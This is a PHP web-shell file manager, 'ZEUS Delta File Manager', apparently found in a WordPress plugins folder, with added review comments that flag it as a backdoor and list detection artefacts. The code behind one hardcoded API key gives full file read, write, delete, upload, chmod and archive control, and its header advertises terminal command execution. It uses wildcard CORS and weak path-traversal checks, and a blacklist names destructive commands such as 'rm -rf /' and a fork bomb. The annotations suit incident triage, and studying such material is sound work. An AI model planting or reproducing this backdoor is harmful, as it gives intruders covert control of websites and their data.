PATH:
home
/
fengshp
/
www
/
wp-content
/
plugins
/
plugins
<?php
/**
 * ZEUS Delta File Manager V3.0 - REST API
 *
 * Allows every file operation to be performed through the API.
 * Authentication: the API key is sent in a header -> X-API-Key: <key>
 *
 * ENDPOINTS:
 *   POST /api.php?action=list        - List directory contents
 *   POST /api.php?action=read        - Read file contents
 *   POST /api.php?action=write       - Write/create a file
 *   POST /api.php?action=delete      - Delete a file/folder
 *   POST /api.php?action=rename      - Rename
 *   POST /api.php?action=copy        - Copy
 *   POST /api.php?action=move        - Move
 *   POST /api.php?action=mkdir       - Create a folder
 *   POST /api.php?action=upload      - Upload a file (multipart)
 *   POST /api.php?action=download    - Download a file
 *   POST /api.php?action=info        - File/folder information
 *   POST /api.php?action=search      - Search files
 *   POST /api.php?action=chmod       - Change permissions
 *   POST /api.php?action=compress    - Archive (zip)
 *   POST /api.php?action=extract     - Extract from an archive
 *   POST /api.php?action=terminal    - Run a terminal command
 *   POST /api.php?action=disk_info   - Disk information
 *   POST /api.php?action=paste_url   - Download a file from a URL
 *   POST /api.php?action=edit_image  - Resize an image
 *   POST /api.php?action=bulk_delete - Bulk delete
 *   POST /api.php?action=bulk_copy   - Bulk copy
 *   POST /api.php?action=bulk_move   - Bulk move
 */

// NOTE(review): what this script gives the holder of one static key, as far
// as this listing shows: read/write/delete of files under the document root,
// uploads, fetching remote URLs to disk, and (in the 'terminal' action further
// down) passing a request-supplied command string to proc_open(). The
// five-entry substring blacklist below is the only filter on that command and
// is not a sandbox. On a host that did not deliberately install it, handle
// the file as a web shell and assume everything the PHP process could reach
// was exposed.
//
// Artefacts this script itself produces, useful for triage and detection:
//   - response header  'X-Powered-By: ZEUS Delta API'
//   - files named      zeus_api_rate_<md5>.json in sys_get_temp_dir(),
//                      written only after a key has been accepted
//   - requests with    ?action=<name> plus an X-API-Key header, an
//                      'Authorization: Bearer' header, or ?api_key=<key>
//   - an optional      config.php beside this file, included if readable

// ==================== CONFIGURATION ====================

// API keys - more than one key may be defined.
// Format: 'api_key' => ['user' => 'username', 'readonly' => false]
// NOTE(review): the key is a literal in the source, so anyone who can read
// this file (or knows the shipped default) holds full read/write access.
$api_keys = array(
    'ZEUS-DELTA-API-KEY-2026' => array('user' => 'zeus', 'readonly' => false),
    // You can add more keys:
    // 'ANOTHER-KEY' => array('user' => 'guest', 'readonly' => true),
);

// API rate limiting (requests per minute)
$api_rate_limit = 120;

// Permission for terminal commands (security risk - use with care)
// NOTE(review): command execution is on by default.
$api_terminal_enabled = true;

// Commands forbidden in the terminal (matched as case-insensitive substrings
// by the 'terminal' action)
$api_terminal_blacklist = array(
    'rm -rf /',
    'mkfs',
    'dd if=',
    ':(){:|:&};:',
    'format c:',
);

// Maximum file read size (bytes) - via the API
$api_max_read_size = 50 * 1024 * 1024; // 50MB

// Root path - the server's document root
$api_root_path = $_SERVER['DOCUMENT_ROOT'];

// Load the config file if it exists (root_path override etc.)
// It is included after the defaults above, so it can replace any of them;
// '@' hides any error raised by the include.
$config_file = __DIR__ . '/config.php';
if (is_readable($config_file)) {
    @include($config_file);
}

// ==================== INIT ====================

// All PHP error output is silenced for the rest of the request.
error_reporting(0);
header('Content-Type: application/json; charset=utf-8');
header('X-Powered-By: ZEUS Delta API');
// Any origin may call the API cross-site and send the key headers.
header('Access-Control-Allow-Origin: *');
header('Access-Control-Allow-Methods: GET, POST, OPTIONS');
header('Access-Control-Allow-Headers: Content-Type, X-API-Key, Authorization');

// OPTIONS preflight - answered with 200 before any authentication happens
if ($_SERVER['REQUEST_METHOD'] === 'OPTIONS') {
    http_response_code(200);
    exit;
}

// ==================== HELPERS ====================

// Sends the JSON envelope and ends the request.
// The body always carries success/message/timestamp; 'data' is added only
// when $data is not null. $code becomes the HTTP status. Never returns.
function api_response($success, $data = null, $message = '', $code = 200) {
    http_response_code($code);
    $response = array(
        'success' => $success,
        'message' => $message,
        'timestamp' => date('c'),
    );
    if ($data !== null) {
        $response['data'] = $data;
    }
    echo json_encode($response, JSON_UNESCAPED_UNICODE | JSON_PRETTY_PRINT);
    exit;
}

// Failure envelope (default HTTP 400). Exits via api_response().
function api_error($message, $code = 400) {
    api_response(false, null, $message, $code);
}

// Success envelope (always HTTP 200). Exits via api_response().
function api_success($data = null, $message = 'OK') {
    api_response(true, $data, $message, 200);
}

// Maps a request-supplied relative path onto $root_path.
// Returns the realpath() of the target when it exists, otherwise the
// unresolved "$root_path/$path" string. Ends the request with 403 when an
// existing target resolves to something that does not start with the
// resolved root.
function api_clean_path($path, $root_path) {
    $path = trim($path);
    $path = trim($path, '/');
    $path = str_replace('\\', '/', $path);
    // Path traversal protection: every '..' is removed in one pass, then
    // repeated slashes are collapsed.
    $path = str_replace('..', '', $path);
    $path = preg_replace('#/+#', '/', $path);
    $path = trim($path, '/');
    $full = $root_path . ($path ? '/' . $path : '');
    $real = realpath($full);
    // If realpath returns false the file does not exist (normal for writes)
    if ($real !== false) {
        // Prevent leaving the root path.
        // NOTE(review): this is a plain string-prefix test with no trailing
        // separator, and it is skipped altogether when realpath($root_path)
        // fails.
        $real_root = realpath($root_path);
        if ($real_root !== false && strpos($real, $real_root) !== 0) {
            api_error('Erisim reddedildi: path root dizin disinda', 403);
        }
        return $real;
    }
    // NOTE(review): a target that does not exist yet is returned without the
    // containment check above; only the string clean-up has been applied.
    return $full;
}

// Returns the request parameters as an array: the decoded JSON body when the
// Content-Type contains 'application/json', otherwise $_POST.
function api_get_input() {
    $content_type = isset($_SERVER['CONTENT_TYPE']) ? $_SERVER['CONTENT_TYPE'] : '';
    if (strpos($content_type, 'application/json') !== false) {
        $raw = file_get_contents('php://input');
        $data = json_decode($raw, true);
        if ($data === null && json_last_error() !== JSON_ERROR_NONE) {
            api_error('Gecersiz JSON verisi');
        }
        // Any falsy decode result (empty body, literal null, 0, ...) becomes
        // an empty array.
        return $data ?: array();
    }
    // Form data or multipart
    return $_POST;
}

// Formats a byte count with a 1024-based unit suffix (B .. TB), e.g. '1.5 KB'.
// Negative input is clamped to 0; anything above TB stays in TB.
function api_format_bytes($bytes, $precision = 2) {
    $units = array('B', 'KB', 'MB', 'GB', 'TB');
    $bytes = max($bytes, 0);
    $pow = floor(($bytes ? log($bytes) : 0) / log(1024));
    $pow = min($pow, count($units) - 1);
    $bytes /= pow(1024, $pow);
    return round($bytes, $precision) . ' ' . $units[$pow];
}

// Returns the MIME type reported by the fileinfo extension for $path, or
// 'application/octet-stream' when that extension is not available.
function api_get_mime($path) {
    if (function_exists('finfo_open')) {
        $finfo = finfo_open(FILEINFO_MIME_TYPE);
        $mime = finfo_file($finfo, $path);
        finfo_close($finfo);
        return $mime;
    }
    return 'application/octet-stream';
}

// Recursively deletes $path. Returns true only if everything was removed.
function api_rdelete($path) {
    // is_link() is tested first, so a symlink is unlinked itself rather than
    // having its target walked.
    if (is_link($path)) {
        return unlink($path);
    } elseif (is_dir($path)) {
        $objects = scandir($path);
        $ok = true;
        if (is_array($objects)) {
            foreach ($objects as $file) {
                if ($file != '.' && $file != '..') {
                    // Keep going after a failure so as much as possible is
                    // removed; the directory itself is then left in place.
                    if (!api_rdelete($path . '/' . $file)) {
                        $ok = false;
                    }
                }
            }
        }
        return ($ok) ? rmdir($path) : false;
    } elseif (is_file($path)) {
        return unlink($path);
    }
    return false;
}

// Copies a file, or a directory tree, from $src to $dest.
// For a single file the result of copy() is returned. For a directory the
// function always returns true: the results of mkdir(), scandir() and the
// nested copy()/api_rcopy() calls are not checked.
function api_rcopy($src, $dest) {
    if (is_file($src)) {
        return copy($src, $dest);
    }
    if (!is_dir($dest)) {
        mkdir($dest, 0755, true);
    }
    $objects = scandir($src);
    foreach ($objects as $file) {
        if ($file == '.' || $file == '..') continue;
        $s = $src . '/' . $file;
        $d = $dest . '/' . $file;
        if (is_dir($s)) {
            api_rcopy($s, $d);
        } else {
            copy($s, $d);
        }
    }
    return true;
}

// Walks $dir recursively and appends one entry (name, path, size, modified)
// to $results for every non-directory whose name contains $filter
// (case-insensitive; an empty filter matches everything). $results is taken
// by reference and is also returned. There is no depth or count limit.
function api_scan_recursive($dir, $filter = '', &$results = array()) {
    $files = scandir($dir);
    foreach ($files as $file) {
        if ($file === '.' || $file === '..') continue;
        $path = $dir . '/' . $file;
        if (is_dir($path)) {
            api_scan_recursive($path, $filter, $results);
        } else {
            if ($filter === '' || stripos($file, $filter) !== false) {
                $results[] = array(
                    'name' => $file,
                    'path' => $path,
                    'size' => filesize($path),
                    'modified' => date('c', filemtime($path)),
                );
            }
        }
    }
    return $results;
}

// Returns the summed filesize() of every non-directory below $dir.
function api_dir_size($dir) {
    $size = 0;
    $files = scandir($dir);
    foreach ($files as $file) {
        if ($file === '.' || $file === '..') continue;
        $path = $dir . '/' . $file;
        if (is_dir($path)) {
            $size += api_dir_size($path);
        } else {
            $size += filesize($path);
        }
    }
    return $size;
}

// ==================== AUTHENTICATION ====================

// Resolves the caller's key to its entry in $api_keys, or ends the request
// with 401 when no key was sent or the key is unknown.
// Sources are tried in this order and the first one present wins:
//   1. X-API-Key header
//   2. Authorization header (used only when it starts with 'Bearer ')
//   3. api_key query-string parameter
// Because this is an elseif chain, an Authorization header without the
// 'Bearer ' prefix leaves the key unset and the query string is not consulted.
// NOTE(review): a key passed as ?api_key= will typically end up in
// web-server access logs, which makes those logs a place to look for use of
// this script - and for the key itself.
function api_authenticate($api_keys) {
    // Take the API key from the header
    $key = null;
    if (isset($_SERVER['HTTP_X_API_KEY'])) {
        $key = $_SERVER['HTTP_X_API_KEY'];
    } elseif (isset($_SERVER['HTTP_AUTHORIZATION'])) {
        $auth = $_SERVER['HTTP_AUTHORIZATION'];
        if (strpos($auth, 'Bearer ') === 0) {
            $key = substr($auth, 7);
        }
    } elseif (isset($_GET['api_key'])) {
        $key = $_GET['api_key'];
    }
    if ($key === null) {
        api_error('API key gerekli. Header: X-API-Key veya Authorization: Bearer <key>', 401);
    }
    // The key is checked by array-key lookup against the configured list.
    if (!isset($api_keys[$key])) {
        api_error('Gecersiz API key', 401);
    }
    return $api_keys[$key];
}

// Rate limiting (simple, file based)
// Keeps the timestamps of the last 60 seconds of requests for $key in
// <temp dir>/zeus_api_rate_<md5($key)>.json and ends the request with 429
// once $limit entries are present. The read and the write are separate
// steps; only the write takes LOCK_EX.
function api_check_rate_limit($key, $limit) {
    $rate_file = sys_get_temp_dir() . '/zeus_api_rate_' . md5($key) . '.json';
    $now = time();
    $window = 60; // 1 minute
    $data = array('requests' => array());
    if (file_exists($rate_file)) {
        // An unreadable or corrupt file is treated as "no requests so far".
        $data = json_decode(file_get_contents($rate_file), true) ?: array('requests' => array());
    }
    // Drop old requests
    $data['requests'] = array_filter($data['requests'], function($t) use ($now, $window) {
        return ($now - $t) < $window;
    });
    if (count($data['requests']) >= $limit) {
        api_error('Rate limit asildi. Dakika basina maksimum ' . $limit . ' istek.', 429);
    }
    $data['requests'][] = $now;
    file_put_contents($rate_file, json_encode($data), LOCK_EX);
}

// ==================== AUTH CHECK ====================

// api_authenticate() exits on a missing or unknown key, so everything below
// runs only for an accepted key.
$api_user = api_authenticate($api_keys);
$api_readonly = $api_user['readonly'];

// Rate limit check
// The bucket is keyed on the raw header value (for Authorization that
// includes the 'Bearer ' prefix). The limiter runs after authentication, so
// rejected keys are never counted and never create a rate file.
$raw_key = isset($_SERVER['HTTP_X_API_KEY']) ? $_SERVER['HTTP_X_API_KEY'] : (isset($_SERVER['HTTP_AUTHORIZATION']) ? $_SERVER['HTTP_AUTHORIZATION'] : (isset($_GET['api_key']) ? $_GET['api_key'] : ''));
api_check_rate_limit($raw_key, $api_rate_limit);

// Set the root path: strip trailing slashes, normalise backslashes
$root_path = rtrim($api_root_path, '\\/');
$root_path = str_replace('\\', '/', $root_path);

// ==================== ROUTER ====================

// The action always comes from the query string; its parameters come from
// the JSON body or $_POST (see api_get_input()).
$action = isset($_GET['action']) ? $_GET['action'] : '';
$input = api_get_input();

// No action: answer with the name, version and endpoint list, then exit
// (api_success() never returns). Reached only with a valid key.
if (empty($action)) {
    api_success(array(
        'version' => '3.0',
        'name' => 'ZEUS Delta File Manager API',
        'endpoints' => array(
            'list', 'read', 'write', 'delete', 'rename', 'copy', 'move',
            'mkdir', 'upload', 'download', 'info', 'search', 'chmod',
            'compress', 'extract', 'terminal', 'disk_info', 'paste_url',
            'bulk_delete', 'bulk_copy', 'bulk_move', 'edit_image'
        )
    ), 'ZEUS Delta API aktif');
}

// Dispatch on the action name. The switch body continues on the source lines
// that follow this block; the last statement below is completed there.
switch ($action) {
    // ==================== LIST ====================
    case 'list':
        $path = isset($input['path']) ? $input['path'] : '';
        $show_hidden = isset($input['show_hidden']) ? (bool)$input['show_hidden'] : false;
        $sort_by = isset($input['sort_by']) ? $input['sort_by'] : 'name'; // name, size, modified, type
        $sort_order = isset($input['sort_order']) ?
$input['sort_order'] : 'asc'; $full_path = api_clean_path($path, $root_path); if (!is_dir($full_path)) { api_error('Dizin bulunamadi: ' . $path, 404); } $items = array(); $files_list = scandir($full_path); foreach ($files_list as $file) { if ($file === '.' || $file === '..') continue; if (!$show_hidden && substr($file, 0, 1) === '.') continue; $file_path = $full_path . '/' . $file; $is_dir = is_dir($file_path); $item = array( 'name' => $file, 'path' => $path ? $path . '/' . $file : $file, 'type' => $is_dir ? 'directory' : 'file', 'size' => $is_dir ? 0 : @filesize($file_path), 'size_human' => $is_dir ? '-' : api_format_bytes(@filesize($file_path)), 'modified' => date('c', @filemtime($file_path)), 'permissions' => substr(sprintf('%o', @fileperms($file_path)), -4), 'readable' => is_readable($file_path), 'writable' => is_writable($file_path), ); if (!$is_dir) { $item['extension'] = pathinfo($file, PATHINFO_EXTENSION); $item['mime'] = api_get_mime($file_path); } $items[] = $item; } // Siralama usort($items, function($a, $b) use ($sort_by, $sort_order) { // Klasorler her zaman once if ($a['type'] !== $b['type']) { return $a['type'] === 'directory' ? -1 : 1; } $cmp = 0; switch ($sort_by) { case 'size': $cmp = $a['size'] - $b['size']; break; case 'modified': $cmp = strcmp($a['modified'], $b['modified']); break; case 'type': $cmp = strcmp($a['extension'] ?? '', $b['extension'] ?? ''); break; default: $cmp = strnatcasecmp($a['name'], $b['name']); } return $sort_order === 'desc' ? -$cmp : $cmp; }); api_success(array( 'path' => $path ?: '/', 'total_items' => count($items), 'directories' => count(array_filter($items, function($i) { return $i['type'] === 'directory'; })), 'files' => count(array_filter($items, function($i) { return $i['type'] === 'file'; })), 'items' => $items, ), 'Dizin listelendi'); break; // ==================== READ ==================== case 'read': $path = isset($input['path']) ? $input['path'] : ''; $encoding = isset($input['encoding']) ? 
$input['encoding'] : 'utf-8'; $base64 = isset($input['base64']) ? (bool)$input['base64'] : false; $offset = isset($input['offset']) ? (int)$input['offset'] : 0; $length = isset($input['length']) ? (int)$input['length'] : 0; if (empty($path)) { api_error('path parametresi gerekli'); } $full_path = api_clean_path($path, $root_path); if (!is_file($full_path)) { api_error('Dosya bulunamadi: ' . $path, 404); } if (!is_readable($full_path)) { api_error('Dosya okunamiyor: ' . $path, 403); } $size = filesize($full_path); if ($size > $api_max_read_size) { api_error('Dosya cok buyuk. Maksimum: ' . api_format_bytes($api_max_read_size) . '. offset/length parametreleri ile parcali okuyun.'); } if ($length > 0) { $fh = fopen($full_path, 'rb'); if ($offset > 0) fseek($fh, $offset); $content = fread($fh, $length); fclose($fh); } else { $content = file_get_contents($full_path); } $response_data = array( 'path' => $path, 'size' => $size, 'size_human' => api_format_bytes($size), 'mime' => api_get_mime($full_path), 'modified' => date('c', filemtime($full_path)), 'encoding' => $encoding, ); if ($base64) { $response_data['content'] = base64_encode($content); $response_data['is_base64'] = true; } else { $response_data['content'] = $content; $response_data['is_base64'] = false; } api_success($response_data, 'Dosya okundu'); break; // ==================== WRITE ==================== case 'write': if ($api_readonly) api_error('Salt okunur mod - yazma izni yok', 403); $path = isset($input['path']) ? $input['path'] : ''; $content = isset($input['content']) ? $input['content'] : ''; $is_base64 = isset($input['base64']) ? (bool)$input['base64'] : false; $append = isset($input['append']) ? (bool)$input['append'] : false; $create_dirs = isset($input['create_dirs']) ? 
(bool)$input['create_dirs'] : true; if (empty($path)) { api_error('path parametresi gerekli'); } $full_path = api_clean_path($path, $root_path); // Ust dizini olustur $dir = dirname($full_path); if ($create_dirs && !is_dir($dir)) { mkdir($dir, 0755, true); } if ($is_base64) { $content = base64_decode($content); if ($content === false) { api_error('Gecersiz base64 verisi'); } } $flags = $append ? FILE_APPEND | LOCK_EX : LOCK_EX; $result = file_put_contents($full_path, $content, $flags); if ($result === false) { api_error('Dosya yazilamadi: ' . $path); } api_success(array( 'path' => $path, 'bytes_written' => $result, 'size_human' => api_format_bytes($result), 'append' => $append, ), 'Dosya yazildi'); break; // ==================== DELETE ==================== case 'delete': if ($api_readonly) api_error('Salt okunur mod - silme izni yok', 403); $path = isset($input['path']) ? $input['path'] : ''; if (empty($path)) { api_error('path parametresi gerekli'); } $full_path = api_clean_path($path, $root_path); if (!file_exists($full_path) && !is_link($full_path)) { api_error('Dosya/klasor bulunamadi: ' . $path, 404); } $is_dir = is_dir($full_path); $result = api_rdelete($full_path); if (!$result) { api_error('Silinemedi: ' . $path); } api_success(array( 'path' => $path, 'type' => $is_dir ? 'directory' : 'file', ), ($is_dir ? 'Klasor' : 'Dosya') . ' silindi'); break; // ==================== RENAME ==================== case 'rename': if ($api_readonly) api_error('Salt okunur mod', 403); $path = isset($input['path']) ? $input['path'] : ''; $new_name = isset($input['new_name']) ? 
$input['new_name'] : ''; if (empty($path) || empty($new_name)) { api_error('path ve new_name parametreleri gerekli'); } // Guvenlik: yeni isimde / veya \ olmasin if (strpos($new_name, '/') !== false || strpos($new_name, '\\') !== false) { api_error('Yeni isimde / veya \\ kullanilamaz'); } $full_path = api_clean_path($path, $root_path); if (!file_exists($full_path)) { api_error('Dosya/klasor bulunamadi: ' . $path, 404); } $new_path = dirname($full_path) . '/' . $new_name; if (file_exists($new_path)) { api_error('Bu isimde dosya/klasor zaten var: ' . $new_name); } $result = rename($full_path, $new_path); if (!$result) { api_error('Yeniden adlandirma basarisiz'); } api_success(array( 'old_path' => $path, 'new_name' => $new_name, 'new_path' => dirname($path) . '/' . $new_name, ), 'Yeniden adlandirildi'); break; // ==================== COPY ==================== case 'copy': if ($api_readonly) api_error('Salt okunur mod', 403); $source = isset($input['source']) ? $input['source'] : ''; $destination = isset($input['destination']) ? $input['destination'] : ''; if (empty($source) || empty($destination)) { api_error('source ve destination parametreleri gerekli'); } $src_path = api_clean_path($source, $root_path); $dest_path = api_clean_path($destination, $root_path); if (!file_exists($src_path)) { api_error('Kaynak bulunamadi: ' . $source, 404); } if (file_exists($dest_path)) { api_error('Hedef zaten var: ' . $destination); } // Hedef dizini olustur $dest_dir = dirname($dest_path); if (!is_dir($dest_dir)) { mkdir($dest_dir, 0755, true); } $result = api_rcopy($src_path, $dest_path); if (!$result) { api_error('Kopyalama basarisiz'); } api_success(array( 'source' => $source, 'destination' => $destination, 'type' => is_dir($dest_path) ? 'directory' : 'file', ), 'Kopyalandi'); break; // ==================== MOVE ==================== case 'move': if ($api_readonly) api_error('Salt okunur mod', 403); $source = isset($input['source']) ? 
$input['source'] : ''; $destination = isset($input['destination']) ? $input['destination'] : ''; if (empty($source) || empty($destination)) { api_error('source ve destination parametreleri gerekli'); } $src_path = api_clean_path($source, $root_path); $dest_path = api_clean_path($destination, $root_path); if (!file_exists($src_path)) { api_error('Kaynak bulunamadi: ' . $source, 404); } // Hedef dizini olustur $dest_dir = dirname($dest_path); if (!is_dir($dest_dir)) { mkdir($dest_dir, 0755, true); } $result = rename($src_path, $dest_path); if (!$result) { api_error('Tasima basarisiz'); } api_success(array( 'source' => $source, 'destination' => $destination, ), 'Tasinildi'); break; // ==================== MKDIR ==================== case 'mkdir': if ($api_readonly) api_error('Salt okunur mod', 403); $path = isset($input['path']) ? $input['path'] : ''; $recursive = isset($input['recursive']) ? (bool)$input['recursive'] : true; $permissions = isset($input['permissions']) ? octdec($input['permissions']) : 0755; if (empty($path)) { api_error('path parametresi gerekli'); } $full_path = api_clean_path($path, $root_path); if (is_dir($full_path)) { api_error('Klasor zaten var: ' . $path); } $result = mkdir($full_path, $permissions, $recursive); if (!$result) { api_error('Klasor olusturulamadi'); } api_success(array( 'path' => $path, 'permissions' => decoct($permissions), ), 'Klasor olusturuldu'); break; // ==================== UPLOAD ==================== case 'upload': if ($api_readonly) api_error('Salt okunur mod', 403); $dest_path = isset($_POST['path']) ? $_POST['path'] : ''; $overwrite = isset($_POST['overwrite']) ? (bool)$_POST['overwrite'] : false; if (empty($_FILES)) { api_error('Dosya yuklemesi gerekli (multipart/form-data, field: file)'); } $full_dest = api_clean_path($dest_path, $root_path); if (!is_dir($full_dest)) { mkdir($full_dest, 0755, true); } $uploaded = array(); $errors = array(); // Tek veya coklu dosya $files = isset($_FILES['file']) ? 
$_FILES['file'] : $_FILES; // Normalize: tek dosya ise array'e cevir if (isset($files['name']) && !is_array($files['name'])) { $files = array( 'name' => array($files['name']), 'tmp_name' => array($files['tmp_name']), 'size' => array($files['size']), 'error' => array($files['error']), 'type' => array($files['type']), ); } elseif (isset($files['name']) && is_array($files['name'])) { // Zaten dogru formatta } else { // Farkli field isimleri $normalized = array('name' => array(), 'tmp_name' => array(), 'size' => array(), 'error' => array(), 'type' => array()); foreach ($files as $field => $file_data) { $normalized['name'][] = $file_data['name']; $normalized['tmp_name'][] = $file_data['tmp_name']; $normalized['size'][] = $file_data['size']; $normalized['error'][] = $file_data['error']; $normalized['type'][] = $file_data['type']; } $files = $normalized; } for ($i = 0; $i < count($files['name']); $i++) { $name = $files['name'][$i]; $tmp = $files['tmp_name'][$i]; $size = $files['size'][$i]; $error = $files['error'][$i]; if ($error !== UPLOAD_ERR_OK) { $errors[] = array('file' => $name, 'error' => 'Upload hatasi: ' . $error); continue; } $target = $full_dest . '/' . $name; if (file_exists($target) && !$overwrite) { $errors[] = array('file' => $name, 'error' => 'Dosya zaten var (overwrite=false)'); continue; } if (move_uploaded_file($tmp, $target)) { $uploaded[] = array( 'name' => $name, 'path' => ($dest_path ? $dest_path . '/' : '') . $name, 'size' => $size, 'size_human' => api_format_bytes($size), ); } else { $errors[] = array('file' => $name, 'error' => 'Dosya tasinamadi'); } } api_success(array( 'uploaded' => $uploaded, 'errors' => $errors, 'total_uploaded' => count($uploaded), 'total_errors' => count($errors), ), count($uploaded) . ' dosya yuklendi'); break; // ==================== DOWNLOAD ==================== case 'download': $path = isset($input['path']) ? $input['path'] : (isset($_GET['path']) ? 
$_GET['path'] : ''); if (empty($path)) { api_error('path parametresi gerekli'); } $full_path = api_clean_path($path, $root_path); if (!is_file($full_path)) { api_error('Dosya bulunamadi: ' . $path, 404); } // JSON header'i kaldir ve dosyayi gonder header_remove('Content-Type'); header('Content-Type: ' . api_get_mime($full_path)); header('Content-Disposition: attachment; filename="' . basename($full_path) . '"'); header('Content-Length: ' . filesize($full_path)); header('Cache-Control: no-cache'); readfile($full_path); exit; break; // ==================== INFO ==================== case 'info': $path = isset($input['path']) ? $input['path'] : ''; if (empty($path)) { api_error('path parametresi gerekli'); } $full_path = api_clean_path($path, $root_path); if (!file_exists($full_path)) { api_error('Dosya/klasor bulunamadi: ' . $path, 404); } $is_dir = is_dir($full_path); $stat = stat($full_path); $info = array( 'name' => basename($full_path), 'path' => $path, 'full_path' => $full_path, 'type' => $is_dir ? 'directory' : 'file', 'size' => $is_dir ? api_dir_size($full_path) : filesize($full_path), 'size_human' => api_format_bytes($is_dir ? api_dir_size($full_path) : filesize($full_path)), 'permissions' => substr(sprintf('%o', fileperms($full_path)), -4), 'owner' => function_exists('posix_getpwuid') ? posix_getpwuid(fileowner($full_path))['name'] : fileowner($full_path), 'group' => function_exists('posix_getgrgid') ? 
posix_getgrgid(filegroup($full_path))['name'] : filegroup($full_path), 'created' => date('c', $stat['ctime']), 'modified' => date('c', $stat['mtime']), 'accessed' => date('c', $stat['atime']), 'readable' => is_readable($full_path), 'writable' => is_writable($full_path), 'executable' => is_executable($full_path), 'is_link' => is_link($full_path), ); if (!$is_dir) { $info['extension'] = pathinfo($full_path, PATHINFO_EXTENSION); $info['mime'] = api_get_mime($full_path); $info['md5'] = md5_file($full_path); $info['sha1'] = sha1_file($full_path); } if ($is_dir) { $contents = scandir($full_path); $contents = array_diff($contents, array('.', '..')); $info['item_count'] = count($contents); $info['dir_count'] = count(array_filter($contents, function($f) use ($full_path) { return is_dir($full_path.'/'.$f); })); $info['file_count'] = $info['item_count'] - $info['dir_count']; } if (is_link($full_path)) { $info['link_target'] = readlink($full_path); } api_success($info, 'Bilgi alindi'); break; // ==================== SEARCH ==================== case 'search': $path = isset($input['path']) ? $input['path'] : ''; $query = isset($input['query']) ? $input['query'] : ''; $content_search = isset($input['content']) ? $input['content'] : ''; $extension = isset($input['extension']) ? $input['extension'] : ''; $max_results = isset($input['max_results']) ? (int)$input['max_results'] : 500; if (empty($query) && empty($content_search)) { api_error('query veya content parametresi gerekli'); } $full_path = api_clean_path($path, $root_path); if (!is_dir($full_path)) { api_error('Dizin bulunamadi: ' . 
$path, 404); } $results = array(); api_scan_recursive($full_path, $query, $results); // Extension filtresi if (!empty($extension)) { $results = array_filter($results, function($item) use ($extension) { return strtolower(pathinfo($item['name'], PATHINFO_EXTENSION)) === strtolower($extension); }); $results = array_values($results); } // Icerik arama if (!empty($content_search)) { $content_results = array(); foreach ($results as $item) { if (is_readable($item['path']) && filesize($item['path']) < 5 * 1024 * 1024) { $file_content = file_get_contents($item['path']); if (stripos($file_content, $content_search) !== false) { // Eslesen satirlari bul $lines = explode("\n", $file_content); $matching_lines = array(); foreach ($lines as $num => $line) { if (stripos($line, $content_search) !== false) { $matching_lines[] = array( 'line_number' => $num + 1, 'content' => trim($line), ); } } $item['matches'] = $matching_lines; $content_results[] = $item; } } } $results = $content_results; } // Limit $results = array_slice($results, 0, $max_results); // Pathleri relative yap foreach ($results as &$item) { $item['path'] = str_replace($root_path . '/', '', $item['path']); $item['path'] = str_replace($root_path, '', $item['path']); } api_success(array( 'query' => $query ?: $content_search, 'search_path' => $path ?: '/', 'total_results' => count($results), 'results' => $results, ), count($results) . ' sonuc bulundu'); break; // ==================== CHMOD ==================== case 'chmod': if ($api_readonly) api_error('Salt okunur mod', 403); $path = isset($input['path']) ? $input['path'] : ''; $permissions = isset($input['permissions']) ? $input['permissions'] : ''; $recursive = isset($input['recursive']) ? (bool)$input['recursive'] : false; if (empty($path) || empty($permissions)) { api_error('path ve permissions parametreleri gerekli (ornek: "0755")'); } $full_path = api_clean_path($path, $root_path); if (!file_exists($full_path)) { api_error('Dosya/klasor bulunamadi: ' . 
$path, 404); } $mode = octdec($permissions); if ($recursive && is_dir($full_path)) { $iterator = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($full_path, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST ); $count = 0; foreach ($iterator as $item) { if (chmod($item->getPathname(), $mode)) { $count++; } } chmod($full_path, $mode); api_success(array('path' => $path, 'permissions' => $permissions, 'affected' => $count + 1), 'Izinler degistirildi'); } else { $result = chmod($full_path, $mode); if (!$result) { api_error('Izin degistirme basarisiz'); } api_success(array('path' => $path, 'permissions' => $permissions), 'Izinler degistirildi'); } break; // ==================== COMPRESS ==================== case 'compress': if ($api_readonly) api_error('Salt okunur mod', 403); $path = isset($input['path']) ? $input['path'] : ''; $dest = isset($input['destination']) ? $input['destination'] : ''; if (empty($path)) { api_error('path parametresi gerekli'); } if (!class_exists('ZipArchive')) { api_error('ZipArchive extension yuklu degil'); } $full_path = api_clean_path($path, $root_path); if (!file_exists($full_path)) { api_error('Dosya/klasor bulunamadi: ' . $path, 404); } // Hedef zip dosyasi if (empty($dest)) { $dest_path = $full_path . '.zip'; } else { $dest_path = api_clean_path($dest, $root_path); } $zip = new ZipArchive(); if ($zip->open($dest_path, ZipArchive::CREATE | ZipArchive::OVERWRITE) !== true) { api_error('ZIP dosyasi olusturulamadi'); } if (is_dir($full_path)) { $iterator = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($full_path, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST ); foreach ($iterator as $item) { $relative = str_replace($full_path . 
'/', '', $item->getPathname()); if ($item->isDir()) { $zip->addEmptyDir($relative); } else { $zip->addFile($item->getPathname(), $relative); } } } else { $zip->addFile($full_path, basename($full_path)); } $file_count = $zip->numFiles; $zip->close(); api_success(array( 'source' => $path, 'archive' => str_replace($root_path . '/', '', $dest_path), 'archive_size' => filesize($dest_path), 'archive_size_human' => api_format_bytes(filesize($dest_path)), 'files_compressed' => $file_count, ), 'Arsivleme tamamlandi'); break; // ==================== EXTRACT ==================== case 'extract': if ($api_readonly) api_error('Salt okunur mod', 403); $path = isset($input['path']) ? $input['path'] : ''; $dest = isset($input['destination']) ? $input['destination'] : ''; if (empty($path)) { api_error('path parametresi gerekli (zip dosyasi)'); } if (!class_exists('ZipArchive')) { api_error('ZipArchive extension yuklu degil'); } $full_path = api_clean_path($path, $root_path); if (!is_file($full_path)) { api_error('ZIP dosyasi bulunamadi: ' . $path, 404); } $zip = new ZipArchive(); if ($zip->open($full_path) !== true) { api_error('ZIP dosyasi acilamadi'); } if (empty($dest)) { $dest_path = dirname($full_path) . '/' . pathinfo($full_path, PATHINFO_FILENAME); } else { $dest_path = api_clean_path($dest, $root_path); } if (!is_dir($dest_path)) { mkdir($dest_path, 0755, true); } $file_count = $zip->numFiles; $zip->extractTo($dest_path); $zip->close(); api_success(array( 'archive' => $path, 'destination' => str_replace($root_path . '/', '', $dest_path), 'files_extracted' => $file_count, ), 'Arsiv cikarildi'); break; // 